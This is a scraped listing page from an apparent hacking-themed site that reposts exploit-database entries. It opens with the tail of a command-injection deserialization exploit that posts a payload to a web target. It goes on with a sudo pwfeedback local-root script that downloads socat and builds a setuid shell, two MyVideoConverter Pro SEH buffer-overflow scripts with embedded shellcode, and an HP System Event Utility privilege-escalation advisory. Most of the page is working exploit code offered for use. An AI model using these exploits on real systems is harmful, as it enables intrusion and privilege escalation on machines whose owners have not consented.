raw_input("Write your full command here to execute on the test target system (Make sure you have permissions from system owner):") #escapedcmd = escape(cmd,html_escape_table) cmd = cmd.replace("&","&") cmd = cmd.replace(">",">") cmd = cmd.replace("<","<") cmd = cmd.replace("\"",""") cmd = cmd.replace("'","&apos;") escapedcmd = escape(cmd) print(escapedcmd) srlcmd = serialize_command(escapedcmd) length = 1448 + len(escapedcmd) hex_length = format(length * 4,'x') serialized_length = hex_length[::-1] payload = payload.replace("e200e200e200140024003400e200e200e200",srlcmd) payload = payload.replace("zzzz",serialized_length) print("Deserialized Payload:") print(deserialize_command(payload[8:])) data = {"__VIEWSTATE":viewstate,"__EVENTVALIDATION":eventvalidation,"ctl00$PlaceHolderDialogBodySection$ctl05$hiddenSpanData":payload} thirdcall = requests.post(FullURL, data=data,headers=headers) print("Payload launched! Check execution results. Exiting...")
  22. HireHackking

    Sudo 1.8.25p - 'pwfeedback' Buffer Overflow

    HireHackking posted a blog entry in Hacker Technology
    #!/bin/bash # We will need socat to run this. if [ ! -f socat ]; then wget https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x86_64/socat chmod +x socat fi cat <<EOF > xpl.pl \$buf_sz = 256; \$askpass_sz = 32; \$signo_sz = 4*65; \$tgetpass_flag = "\x04\x00\x00\x00" . ("\x00"x24); print("\x00\x15"x(\$buf_sz+\$askpass_sz) . ("\x00\x15"x\$signo_sz) . (\$tgetpass_flag) . "\x37\x98\x01\x00\x35\x98\x01\x00\x35\x98\x01\x00\xff\xff\xff\xff\x35\x98\x01\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x15"x104 . "\n"); EOF cat <<EOF > exec.c #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <sys/stat.h> #include <stdlib.h> #include <unistd.h> int main(void) { printf("Exploiting!\n"); int fd = open("/proc/self/exe", O_RDONLY); struct stat st; fstat(fd, &st); if (st.st_uid != 0) { fchown(fd, 0, st.st_gid); fchmod(fd, S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IXGRP); } else { setuid(0); execve("/bin/bash",NULL,NULL); } return 0; } EOF cc -w exec.c -o /tmp/pipe ./socat pty,link=/tmp/pty,waitslave exec:"perl xpl.pl"& sleep 0.5 export SUDO_ASKPASS=/tmp/pipe sudo -k -S id < /tmp/pty /tmp/pipe
  23. HireHackking

    MyVideoConverter Pro 3.14 - 'Output Folder' Buffer Overflow

    HireHackking posted a blog entry in Hacker Technology
    #Exploit Title: MyVideoConverter Pro 3.14 - 'Output Folder' Buffer Overflow #Exploit Author : ZwX #Exploit Date: 2020-02-11 #Vendor Homepage : http://www.ivideogo.com/ #Tested on OS: Windows 10 v1803 #Social: twitter.com/ZwX2a ## Steps to Reproduce: ## #1. Run the python exploit script, it will create a new file with the name "exploit.txt". #2. Just copy the text inside "exploit.txt". #3. Start the program. In the new window click "Options" > "Settins" . #4. Now paste the content of "exploit.txt" into the field: "Output Folder" > Click "..." #5. The calculator runs successfully #!/usr/bin/python from struct import pack buffer = "\x41" * 268 nseh = "\xeb\x06\xff\xff" seh = pack("<I",0x10045ebb) #0x10045ebb : pop edi # pop ebx # ret | {PAGE_EXECUTE_READ} [mysubtitle.dll] #ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.1 (C:\Program Files\MyVideoConverter Pro\mysubtitle.dll) shellcode = "" shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29" shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca" shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca" shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2" shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17" shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59" shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1" shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf" shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82" shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5" shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4" shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20" shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d" shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee" shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9" shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a" shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d" payload = buffer + nseh + seh + shellcode try: f=open("exploit.txt","w") print "[+] Creating %s bytes evil payload.." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created"
  24. HireHackking

    HP System Event Utility - Local Privilege Escalation

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: HP System Event Utility - Local Privilege Escalation # Author: hyp3rlinx # Date: 2020-02-11 # Vendor: www.hp.com # Link: https://hp-system-event-utility.en.lo4d.com/download # CVE: CVE-2019-18915 [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/HP-SYSTEM-EVENT-UTILITY-LOCAL-PRIVILEGE-ESCALATION.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.hp.com [Product] HP System Event Utility The genuine HPMSGSVC.exe file is a software component of HP System Event Utility by HP Inc. HP System Event Utility enables the functioning of special function keys on select HP devices. [Vulnerability Type] Local Privilege Escalation [CVE Reference] CVE-2019-18915 [Security Issue] The HP System Event service "HPMSGSVC.exe" will load an arbitrary EXE and execute it with SYSTEM integrity. HPMSGSVC.exe runs a background process that delivers push notifications. The problem is that HP Message Service will load and execute any arbitrary executable named "Program.exe" if found in the users c:\ drive. Path: C:\Program Files (x86)\HP\HP System Event\SmrtAdptr.exe Two Handles are inherit, properties are Write/Read Name: \Device\ConDrv This results in arbitrary code execution persistence mechanism if an attacker can place an EXE in this location and can be used to escalate privileges from Admin to SYSTEM. HP has/is released/releasing a mitigation: https://support.hp.com/us-en/document/c06559359 [References] PSR-2019-0204 https://support.hp.com/us-en/document/c06559359 [Network Access] Local [Disclosure Timeline] Vendor Notification: October 7, 2019 HP PSRT "product team will address the issue in next release" : January 13, 2020 HP advisory and mitigation release : February 10, 2020 February 11, 2020 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
  25. HireHackking

    MyVideoConverter Pro 3.14 - 'TVSeries' Buffer Overflow

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: MyVideoConverter Pro 3.14 - 'TVSeries' Buffer Overflow # Exploit Author : ZwX # Exploit Date: 2020-02-11 # Vendor Homepage : http://www.ivideogo.com/ # Tested on OS: Windows 10 v1803 # Social: twitter.com/ZwX2a ## Steps to Reproduce: ## #1. Run the python exploit script, it will create a new file with the name "Shell.txt". #2. Just copy the text inside "Shell.txt". #3. Start the program. In the new window click "Add" > "Convert DVD" > "TVSeries" . #4. Now paste the content of "Shell.txt" into the field: "Video Folder" > Click "..." #5. The calculator runs successfully #!/usr/bin/python from struct import pack buffer = "\x41" * 268 nseh = "\xeb\x06\xff\xff" seh = pack("<I",0x10039291) #0x10039291 : pop ecx # pop ebx # ret 0x04 | {PAGE_EXECUTE_READ} [mysubtitle.dll] #ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.1 (C:\Program Files\MyVideoConverter Pro\mysubtitle.dll) shellcode = "" shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29" shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca" shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca" shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2" shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17" shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59" shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1" shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf" shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82" shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5" shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4" shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20" shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d" shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee" shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9" shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a" shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d" payload = buffer + nseh + seh + shellcode try: f=open("Shell.txt","w") print "[+] Creating %s bytes evil payload.." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created"